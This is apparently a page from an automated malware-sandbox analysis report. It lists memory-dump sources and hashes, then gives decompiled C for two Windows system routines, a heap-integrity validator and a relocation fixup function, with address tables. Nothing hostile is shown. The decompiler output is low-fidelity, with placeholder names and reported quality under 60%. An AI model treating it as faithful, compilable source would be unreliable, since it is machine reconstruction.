                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                        • API String ID: 0-3591852110
                                                        • Opcode ID: 26fa3c386d165d24a94bc6e60d5299dd1815c2c05643c296c66e74c517cf87a3
                                                        • Instruction ID: 68c89e9eabd4372fffc99feb951ced065613507d8cb304cd36472caac74397ca
                                                        • Opcode Fuzzy Hash: 26fa3c386d165d24a94bc6e60d5299dd1815c2c05643c296c66e74c517cf87a3
                                                        • Instruction Fuzzy Hash: 5B62CE7061064ADFCB24DF69C4C0A7AB7F1FF49700B1484E9EA868B662D734ED49DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BF098E, Relevance: 11.7, Strings: 9, Instructions: 401COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E00BF098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int* _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t165;
				intOrPtr _t168;
				signed short _t181;
				intOrPtr _t183;
				signed int* _t204;
				signed int _t209;
				signed int _t214;
				signed int* _t216;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				intOrPtr _t235;
				intOrPtr _t246;
				intOrPtr _t257;
				signed int _t280;
				signed int* _t281;
				signed int* _t282;
				signed short _t284;
				signed short _t286;
				signed char _t288;
				intOrPtr* _t298;
				signed int _t309;
				signed int _t310;
				signed int* _t311;
				unsigned int _t312;
				signed int* _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;

				_t308 = __edx;
				_t311 = _a4;
				_v12 = 0;
				_v8 = 0;
				_v16 = _t311;
				if(E00BEFB7A(__ecx, __edx, _t311, 0) == 0) {
					L84:
					E00BF06F9(_v16);
					_t337 = _v8;
					if(_v8 != 0) {
						_a4 = _a4 & 0x00000000;
						E00B54167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
					}
					L48:
					return 0;
				}
				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
					_t308 = 0;
					_t165 =  &(_t311[0x31]);
					_t280 =  *_t165;
					_a8 = 0;
					_v24 = 0;
					while(_t165 != _t280) {
						_t280 =  *_t280;
						_a4 =  *_t313 & 0x0000ffff;
						_t288 = _t313[0];
						_v16 = _t313;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t168 + 0xc);
							if( *(_t168 + 0xc) == 0) {
								_push("HEAP: ");
								E00B9373B();
							} else {
								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t313);
							E00B9373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
							L22:
							__eflags = _t311[0x13];
							if(_t311[0x13] != 0) {
								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
								 *_t313 =  *_t313 ^ _t311[0x14];
							}
							goto L84;
						}
						_t181 =  *_t313 & 0x0000ffff;
						__eflags = _t181 - _v24;
						if(_t181 < _v24) {
							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t183 + 0xc);
							if( *(_t183 + 0xc) == 0) {
								_push("HEAP: ");
								E00B9373B();
							} else {
								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							E00B9373B("Non-Dedicated free list element %p is out of order\n", _t313);
							goto L22;
						}
						_t308 = 0;
						_v24 = _t181 & 0x0000ffff;
						__eflags = _t311[0x13];
						if(_t311[0x13] != 0) {
							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
							 *_t313 =  *_t313 ^ _t311[0x14];
							__eflags =  *_t313;
						}
						_t29 =  &_a8;
						 *_t29 = _a8 + 1;
						__eflags =  *_t29;
						_t165 =  &(_t311[0x31]);
					}
					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
					if( *0xc292a4 != 0 && _t311[0x30] != _t308) {
						_push(4);
						_push(0x1000);
						_push( &_a4);
						_push(0);
						_push( &_v8);
						if(E00B3FAD0(0xffffffff) >= 0) {
							_v12 = _v8 + 0x204;
						}
					}
					_t204 =  &(_t311[0x28]);
					_t314 =  *_t204;
					while(_t204 != _t314) {
						__eflags = _t311[0x13];
						_t281 = _t314 + 0x18;
						if(_t311[0x13] != 0) {
							 *_t281 =  *_t281 ^ _t311[0x14];
							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
							if(__eflags != 0) {
								_push(0);
								_push(_t281);
								_push(_t311);
								E00BEF8EE(_t281, _t311, _t314, __eflags);
							}
						}
						_t295 = _v12;
						__eflags = _t295;
						if(_t295 == 0) {
							L39:
							__eflags =  *(_t314 + 0x1a) & 0x00000004;
							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
								L41:
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
									 *_t281 =  *_t281 ^ _t311[0x14];
									__eflags =  *_t281;
								}
								_t314 =  *_t314;
								_t204 =  &(_t311[0x28]);
								continue;
							}
							_t209 = E00BD579A(_t295, _t311, _t281);
							__eflags = _t209;
							if(_t209 == 0) {
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
									_t95 = _t314 + 0x18;
									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
									__eflags =  *_t95;
								}
								goto L48;
							}
							goto L41;
						} else {
							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
							__eflags = _t214;
							if(_t214 == 0) {
								goto L39;
							}
							__eflags = _t214 & 0x00008000;
							if((_t214 & 0x00008000) == 0) {
								__eflags = _t214 & 0x00000800;
								if((_t214 & 0x00000800) != 0) {
									goto L39;
								}
								__eflags = _t214 - _t311[0x22];
								if(_t214 >= _t311[0x22]) {
									goto L39;
								}
								L38:
								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
								_t295 =  *(_t314 + 0x10) >> 3;
								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
								__eflags =  *_t216;
								goto L39;
							}
							_t214 = _t214 & 0x00007fff;
							_t295 = 0x81;
							__eflags = _t214 - 0x81;
							if(_t214 >= 0x81) {
								goto L39;
							}
							_t295 = _v8;
							goto L38;
						}
					}
					_v20 = _v20 & 0x00000000;
					_v24 = _v24 & 0x00000000;
					_t282 =  &(_t311[0x2a]);
					_t315 =  *_t282;
					while(_t315 != _t282) {
						_t226 = E00BEFDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
						__eflags = _t226;
						if(_t226 == 0) {
							goto L84;
						}
						_t315 =  *_t315;
					}
					_t316 = _a8;
					_v16 = _t311;
					if(_t316 == _v20) {
						__eflags = _t311[0x1e] - _v24;
						if(_t311[0x1e] == _v24) {
							_t228 = _v8;
							__eflags = _t228;
							if(_t228 == 0) {
								goto L74;
							}
							_t317 = _t311[0x30];
							__eflags = _t317;
							if(_t317 == 0) {
								L68:
								_t318 = _t311[0x23];
								__eflags = _t318;
								if(__eflags == 0) {
									L73:
									_a4 = 0;
									E00B54167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
									goto L74;
								}
								_t233 = _t311[0x22] & 0x0000ffff;
								_t284 = 1;
								_t308 = 1;
								__eflags = 1 - _t233;
								if(__eflags >= 0) {
									goto L73;
								}
								_t312 = _v12;
								while(1) {
									_t309 = _t284 & 0x0000ffff;
									_t308 =  *(_t312 + _t309 * 4);
									_t318 = _t318 + 0x40;
									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
										break;
									}
									_t284 = _t284 + 1;
									__eflags = _t284 - _t233;
									if(__eflags < 0) {
										continue;
									}
									goto L73;
								}
								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t235 + 0xc);
								if( *(_t235 + 0xc) == 0) {
									_push("HEAP: ");
									E00B9373B();
								} else {
									E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
								_push(_t298);
								_push( *_t298);
								_t319 = _t318 + 0x10;
								__eflags = _t319;
								_push( *((intOrPtr*)(_t319 - 8)));
								_push(_t319);
								E00B9373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
								goto L84;
							}
							_t286 = 1;
							__eflags = 1;
							while(1) {
								_t310 = _t286 & 0x0000ffff;
								_t308 =  *(_t228 + _t310 * 4);
								_t317 = _t317 + 0xc;
								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
									break;
								}
								_t286 = _t286 + 1;
								_t308 = 0x81;
								__eflags = _t286 - 0x81;
								if(_t286 < 0x81) {
									continue;
								}
								goto L68;
							}
							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t246 + 0xc);
							if( *(_t246 + 0xc) == 0) {
								_push("HEAP: ");
								E00B9373B();
							} else {
								E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
							_push( *((intOrPtr*)(_t317 + 8)));
							E00B9373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
							goto L84;
						}
						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t257 + 0xc);
						if( *(_t257 + 0xc) == 0) {
							_push("HEAP: ");
							E00B9373B();
						} else {
							E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t311[0x1e]);
						_push(_v24);
						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
						L57:
						E00B9373B();
						goto L84;
					}
					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
						_push("HEAP: ");
						E00B9373B();
					} else {
						E00B9373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t316);
					_push(_v20);
					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
					goto L57;
				} else {
					L74:
					return 1;
				}
			}












































                                                        0x00bf098e
                                                        0x00bf0999
                                                        0x00bf09a0
                                                        0x00bf09a3
                                                        0x00bf09a6
                                                        0x00bf09b0
                                                        0x00bf0e2c
                                                        0x00bf0e2f
                                                        0x00bf0e34
                                                        0x00bf0e38
                                                        0x00bf0e3e
                                                        0x00bf0e51
                                                        0x00bf0e51
                                                        0x00bf0c22
                                                        0x00000000
                                                        0x00bf0c22
                                                        0x00bf09ba
                                                        0x00bf09c9
                                                        0x00bf09cb
                                                        0x00bf09d1
                                                        0x00bf09d3
                                                        0x00bf09d6
                                                        0x00bf0a47
                                                        0x00bf0a01
                                                        0x00bf0a03
                                                        0x00bf0a06
                                                        0x00bf0a09
                                                        0x00bf0a0c
                                                        0x00bf0a0f
                                                        0x00bf0aa7
                                                        0x00bf0aaa
                                                        0x00bf0aae
                                                        0x00bf0ad0
                                                        0x00bf0ad5
                                                        0x00bf0ab0
                                                        0x00bf0ac8
                                                        0x00bf0acd
                                                        0x00bf0adb
                                                        0x00bf0ae4
                                                        0x00bf0aec
                                                        0x00bf0aec
                                                        0x00bf0af0
                                                        0x00bf0afe
                                                        0x00bf0b04
                                                        0x00bf0b04
                                                        0x00000000
                                                        0x00bf0af0
                                                        0x00bf0a15
                                                        0x00bf0a18
                                                        0x00bf0a1c
                                                        0x00bf0b11
                                                        0x00bf0b14
                                                        0x00bf0b18
                                                        0x00bf0b3a
                                                        0x00bf0b3f
                                                        0x00bf0b1a
                                                        0x00bf0b32
                                                        0x00bf0b37
                                                        0x00bf0b4b
                                                        0x00000000
                                                        0x00bf0b51
                                                        0x00bf0a25
                                                        0x00bf0a27
                                                        0x00bf0a2a
                                                        0x00bf0a2d
                                                        0x00bf0a36
                                                        0x00bf0a3c
                                                        0x00bf0a3c
                                                        0x00bf0a3c
                                                        0x00bf0a3e
                                                        0x00bf0a3e
                                                        0x00bf0a3e
                                                        0x00bf0a41
                                                        0x00bf0a41
                                                        0x00bf0a60
                                                        0x00bf0a63
                                                        0x00bf0a6d
                                                        0x00bf0a6f
                                                        0x00bf0a77
                                                        0x00bf0a78
                                                        0x00bf0a7d
                                                        0x00bf0a87
                                                        0x00bf0a91
                                                        0x00bf0a91
                                                        0x00bf0a87
                                                        0x00bf0a94
                                                        0x00bf0a9a
                                                        0x00bf0bf0
                                                        0x00bf0b54
                                                        0x00bf0b58
                                                        0x00bf0b5b
                                                        0x00bf0b60
                                                        0x00bf0b6a
                                                        0x00bf0b6d
                                                        0x00bf0b6f
                                                        0x00bf0b71
                                                        0x00bf0b72
                                                        0x00bf0b73
                                                        0x00bf0b73
                                                        0x00bf0b6d
                                                        0x00bf0b78
                                                        0x00bf0b7b
                                                        0x00bf0b7d
                                                        0x00bf0bc1
                                                        0x00bf0bc1
                                                        0x00bf0bc5
                                                        0x00bf0bd2
                                                        0x00bf0bd2
                                                        0x00bf0bd6
                                                        0x00bf0be0
                                                        0x00bf0be6
                                                        0x00bf0be6
                                                        0x00bf0be6
                                                        0x00bf0be8
                                                        0x00bf0bea
                                                        0x00000000
                                                        0x00bf0bea
                                                        0x00bf0bc9
                                                        0x00bf0bce
                                                        0x00bf0bd0
                                                        0x00bf0c0a
                                                        0x00bf0c0e
                                                        0x00bf0c19
                                                        0x00bf0c1f
                                                        0x00bf0c1f
                                                        0x00bf0c1f
                                                        0x00bf0c1f
                                                        0x00000000
                                                        0x00bf0c0e
                                                        0x00000000
                                                        0x00bf0b7f
                                                        0x00bf0b7f
                                                        0x00bf0b83
                                                        0x00bf0b86
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0b88
                                                        0x00bf0b8d
                                                        0x00bf0ba3
                                                        0x00bf0ba8
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0baa
                                                        0x00bf0bb1
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0bb3
                                                        0x00bf0bb6
                                                        0x00bf0bbc
                                                        0x00bf0bbf
                                                        0x00bf0bbf
                                                        0x00000000
                                                        0x00bf0bbf
                                                        0x00bf0b8f
                                                        0x00bf0b94
                                                        0x00bf0b99
                                                        0x00bf0b9c
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0b9e
                                                        0x00000000
                                                        0x00bf0b9e
                                                        0x00bf0b7d
                                                        0x00bf0bf8
                                                        0x00bf0bfc
                                                        0x00bf0c00
                                                        0x00bf0c06
                                                        0x00bf0c51
                                                        0x00bf0c42
                                                        0x00bf0c47
                                                        0x00bf0c49
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0c4f
                                                        0x00bf0c4f
                                                        0x00bf0c55
                                                        0x00bf0c58
                                                        0x00bf0c5e
                                                        0x00bf0cb3
                                                        0x00bf0cb6
                                                        0x00bf0cff
                                                        0x00bf0d04
                                                        0x00bf0d06
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0d08
                                                        0x00bf0d0e
                                                        0x00bf0d10
                                                        0x00bf0d2e
                                                        0x00bf0d2e
                                                        0x00bf0d34
                                                        0x00bf0d36
                                                        0x00bf0d60
                                                        0x00bf0d6f
                                                        0x00bf0d72
                                                        0x00000000
                                                        0x00bf0d72
                                                        0x00bf0d38
                                                        0x00bf0d41
                                                        0x00bf0d42
                                                        0x00bf0d44
                                                        0x00bf0d47
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0d49
                                                        0x00bf0d4c
                                                        0x00bf0d4c
                                                        0x00bf0d4f
                                                        0x00bf0d52
                                                        0x00bf0d55
                                                        0x00bf0d58
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0d5a
                                                        0x00bf0d5b
                                                        0x00bf0d5e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0d5e
                                                        0x00bf0ddb
                                                        0x00bf0dde
                                                        0x00bf0de1
                                                        0x00bf0e03
                                                        0x00bf0e08
                                                        0x00bf0de3
                                                        0x00bf0dfb
                                                        0x00bf0e00
                                                        0x00bf0e11
                                                        0x00bf0e14
                                                        0x00bf0e15
                                                        0x00bf0e17
                                                        0x00bf0e17
                                                        0x00bf0e1a
                                                        0x00bf0e1d
                                                        0x00bf0e24
                                                        0x00000000
                                                        0x00bf0e29
                                                        0x00bf0d14
                                                        0x00bf0d14
                                                        0x00bf0d15
                                                        0x00bf0d15
                                                        0x00bf0d18
                                                        0x00bf0d1b
                                                        0x00bf0d1e
                                                        0x00bf0d21
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0d23
                                                        0x00bf0d24
                                                        0x00bf0d29
                                                        0x00bf0d2c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bf0d2c
                                                        0x00bf0d86
                                                        0x00bf0d89
                                                        0x00bf0d8c
                                                        0x00bf0dae
                                                        0x00bf0db3
                                                        0x00bf0d8e
                                                        0x00bf0da6
                                                        0x00bf0dab
                                                        0x00bf0dbf
                                                        0x00bf0dc2
                                                        0x00bf0dcb
                                                        0x00000000
                                                        0x00bf0dd0
                                                        0x00bf0cbe
                                                        0x00bf0cc1
                                                        0x00bf0cc5
                                                        0x00bf0ce7
                                                        0x00bf0cec
                                                        0x00bf0cc7
                                                        0x00bf0cdf
                                                        0x00bf0ce4
                                                        0x00bf0cf2
                                                        0x00bf0cf5
                                                        0x00bf0cf8
                                                        0x00bf0ca3
                                                        0x00bf0ca3
                                                        0x00000000
                                                        0x00bf0ca8
                                                        0x00bf0c6d
                                                        0x00bf0c8f
                                                        0x00bf0c94
                                                        0x00bf0c6f
                                                        0x00bf0c87
                                                        0x00bf0c8c
                                                        0x00bf0c9a
                                                        0x00bf0c9b
                                                        0x00bf0c9e
                                                        0x00000000
                                                        0x00bf0d77
                                                        0x00bf0d77
                                                        0x00000000
                                                        0x00bf0d77

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%x != %x) %p$RtlFreeHeap$Tag %04x (%ws) size incorrect (%x != %x) %p$Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)$dedicated (%04x) free list element %p is marked busy
                                                        • API String ID: 0-3316276410
                                                        • Opcode ID: fe79f17033f16bfe1475474a665cae2a4e3e3988431df695c489faa9a3462032
                                                        • Instruction ID: 3c907f7fe18edcfda962c770ffc3a6a59804931dbf58ca00868508791f9f9964
                                                        • Opcode Fuzzy Hash: fe79f17033f16bfe1475474a665cae2a4e3e3988431df695c489faa9a3462032
                                                        • Instruction Fuzzy Hash: E5F1D075A10249AFCB20EF68C480FBAB7E5FF04710F5484E5E9859B6A2C734AE49DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00BECFB1, Relevance: 11.5, Strings: 9, Instructions: 266COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 57%
                                                        			E00BECFB1(signed int _a4, intOrPtr _a8) {
				unsigned int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed short* _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _t82;
				unsigned int _t88;
				intOrPtr _t92;
				unsigned int _t94;
				unsigned int _t96;
				char* _t97;
				void* _t99;
				intOrPtr _t100;
				void* _t104;
				intOrPtr _t105;
				void* _t109;
				intOrPtr _t110;
				void* _t118;
				unsigned int _t120;
				signed char _t130;
				void* _t132;
				signed int _t134;
				char* _t136;
				char* _t138;
				unsigned int _t149;
				intOrPtr _t157;
				unsigned int* _t158;
				signed short* _t159;
				char* _t162;
				void* _t164;
				signed int _t167;
				signed int _t169;
				signed int _t171;
				signed int _t174;
				intOrPtr _t179;
				intOrPtr _t186;
				intOrPtr _t189;
				intOrPtr* _t192;
				unsigned int _t196;
				void* _t208;

				_t130 = _a4;
				_t82 =  *((intOrPtr*)(_t130 + 0x18));
				_t186 =  *((intOrPtr*)(_t130 + 8));
				_t179 =  *((intOrPtr*)(_t130 + 0x24)) -  *((intOrPtr*)(_t82 + 0x28));
				_t132 = _t186 -  *((intOrPtr*)(_t82 + 0x20));
				_t120 = _t179 - _t132;
				_v36 = _t186;
				_v32 = _t179;
				_v8 = _t120;
				_v16 =  *((intOrPtr*)(_t82 + 0xc));
				_v12 =  *((intOrPtr*)(_t82 + 8));
				if(_t179 != 0 || _t132 != 0) {
					_v20 = E00B547E4(_t132, _t186);
					if(_v12 == 0) {
						goto L39;
					} else {
						goto L3;
					}
					while(1) {
						L3:
						_t157 = _v16;
						_v12 = _v12 - 1;
						if(_t157 == 0 || _t157 >=  *((intOrPtr*)(_v20 + 0x50))) {
							break;
						}
						_t158 = _t157 + _t186;
						_t88 =  *_t158;
						_t134 = _t88 << 0xc;
						_a4 = _t88 >> 0x14;
						_v28 = _t186 + _t134;
						_t189 = _v16 + 4 + _a4 * 2;
						_t92 =  *((intOrPtr*)(_v20 + 0x50));
						_v16 = _t189;
						if(_t134 >= _t92 || _t189 >= _t92 || (_a4 & 0x00000001) != 0) {
							_push("Invalid fixup information\n");
							_push(0);
							_push(0x55);
							E00B93F92();
							break;
						} else {
							_t159 =  &(_t158[1]);
							while(1) {
								_v24 = _t159;
								if(_a4 == 0) {
									break;
								}
								_t94 =  *_t159 & 0x0000ffff;
								_a4 = _a4 - 1;
								_t192 = (_t94 & 0x00000fff) + _v28;
								_t96 = _t94 >> 0xc;
								if(_t96 == 0) {
									_t97 = 0xb42926;
									if(_a4 == 0) {
										_t97 = " (padding)";
									}
									E00B93F92(0x55, 2, "\t          None%s\n", _t97);
									_t208 = _t208 + 0x10;
									L17:
									_t159 =  &(_v24[1]);
									continue;
								}
								_t99 = _t96 - 1;
								if(_t99 == 0) {
									_t136 = 0xb42926;
									if(_t179 == 0) {
										_t136 = "(no change)";
									}
									_t100 =  *_t192;
									_push(_t136);
									_push(_t100 + _t179);
									_push(_t100);
									asm("cdq");
									_push(_t159);
									E00B93F92(0x55, 2, "\t%08I64X: VA32 %08X -> %08X %s\n", _t192);
									_t208 = _t208 + 0x20;
									if(_t179 != 0) {
										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t179;
									}
									goto L17;
								}
								_t104 = _t99 - 1;
								if(_t104 == 0) {
									_t138 = 0xb42926;
									if(_t120 == 0) {
										_t138 = "(no change)";
									}
									_t105 =  *_t192;
									_push(_t138);
									_t76 = _t120 + 4; // 0x253a7834
									_push(_t105 + _t192 + _t76);
									_push(_t105 + _t120);
									_push(_t105);
									asm("cdq");
									_push(_t159);
									E00B93F92(0x55, 2, "\t%08I64X: PC32 %08X -> %08X (target %p) %s\n", _t192);
									_t208 = _t208 + 0x24;
									if(_t120 != 0) {
										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t120;
									}
									goto L17;
								}
								_t109 = _t104 - 1;
								if(_t109 == 0) {
									_t162 = 0xb42926;
									if(_t179 == 0) {
										_t162 = "(no change)";
									}
									_t110 =  *_t192;
									_push(_t162);
									_t164 = _t110 + _t179;
									asm("adc ecx, ebx");
									_push( *((intOrPtr*)(_t192 + 4)));
									_push(_t164);
									_push( *((intOrPtr*)(_t192 + 4)));
									_push(_t110);
									asm("cdq");
									_push(_t164);
									E00B93F92(0x55, 2, "\t%08I64X: VA64 %016I64X -> %016I64X %s\n", _t192);
									_t208 = _t208 + 0x28;
									if(_t179 != 0) {
										 *((intOrPtr*)(_t192 + _a8)) =  *((intOrPtr*)(_t192 + _a8)) + _t179;
										asm("adc [esi+0x4], ebx");
									}
									L16:
									_t120 = _v8;
									goto L17;
								}
								if(_t109 != 1) {
									asm("cdq");
									_push(_t159);
									E00B93F92(0x55, 0, "\t%08I64X: Unknown\n", _t192);
									goto L38;
								}
								if(_t120 == 0) {
									goto L17;
								} else {
									_t118 = _a8 + _t192;
									_t196 =  *(_t118 + 0xc);
									_t167 = _t196 >> 0x0000001b & 0x00000001;
									_t169 = _t167 << 0x00000017 |  *(_t118 + 8) & 0x007fffff;
									_t171 = _t169 << 0x00000010 |  *(_t118 + 4) >> 0x00000010;
									_t149 = (((0 << 0x00000020 | _t167) << 0x17 << 0x00000020 | _t169) << 0x10 << 0x00000020 | _t171) << 0x14;
									_t174 = (_t171 << 0x00000014 | _t196 >> 0x00000004 & 0x000fffff) + (_v8 >> 4);
									asm("adc ecx, ebx");
									 *(_t118 + 8) = (_t149 >> 0x00000004 ^  *(_t118 + 8)) & 0x007fffff ^  *(_t118 + 8);
									_t179 = _v32;
									 *(_t118 + 4) = (_t149 << 0x00000020 | _t174) >> 0x14 << 0x00000010 |  *(_t118 + 4) & 0x0000ffff;
									 *(_t118 + 0xc) = ((_t149 >> 0x0000001b & 0x00000001) << 0x00000017 | _t174 & 0x000fffff) << 0x00000004 |  *(_t118 + 0xc) & 0xf700000f;
									goto L16;
								}
							}
							if(_v12 == 0) {
								goto L39;
							}
							_t186 = _v36;
							continue;
						}
					}
					L38:
					return 0xc000007b;
				} else {
					L39:
					return 0;
				}
			}














































                                                        0x00becfb9
                                                        0x00becfbc
                                                        0x00becfc4
                                                        0x00becfcb
                                                        0x00becfd0
                                                        0x00becfd8
                                                        0x00becfda
                                                        0x00becfdd
                                                        0x00becfe0
                                                        0x00becfe3
                                                        0x00becfe6
                                                        0x00becfeb
                                                        0x00becfff
                                                        0x00bed002
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00bed008
                                                        0x00bed008
                                                        0x00bed008
                                                        0x00bed00b
                                                        0x00bed010
                                                        0x00000000
                                                        0x00000000
                                                        0x00bed022
                                                        0x00bed024
                                                        0x00bed02b
                                                        0x00bed030
                                                        0x00bed036
                                                        0x00bed03c
                                                        0x00bed043
                                                        0x00bed046
                                                        0x00bed04b
                                                        0x00bed288
                                                        0x00bed28d
                                                        0x00bed28f
                                                        0x00bed291
                                                        0x00000000
                                                        0x00bed063
                                                        0x00bed063
                                                        0x00bed15c
                                                        0x00bed15e
                                                        0x00bed164
                                                        0x00000000
                                                        0x00000000
                                                        0x00bed06b
                                                        0x00bed06e
                                                        0x00bed079
                                                        0x00bed07f
                                                        0x00bed081
                                                        0x00bed24b
                                                        0x00bed253
                                                        0x00bed255
                                                        0x00bed255
                                                        0x00bed264
                                                        0x00bed269
                                                        0x00bed157
                                                        0x00bed15b
                                                        0x00000000
                                                        0x00bed15b
                                                        0x00bed087
                                                        0x00bed088
                                                        0x00bed20d
                                                        0x00bed212
                                                        0x00bed214
                                                        0x00bed214
                                                        0x00bed219
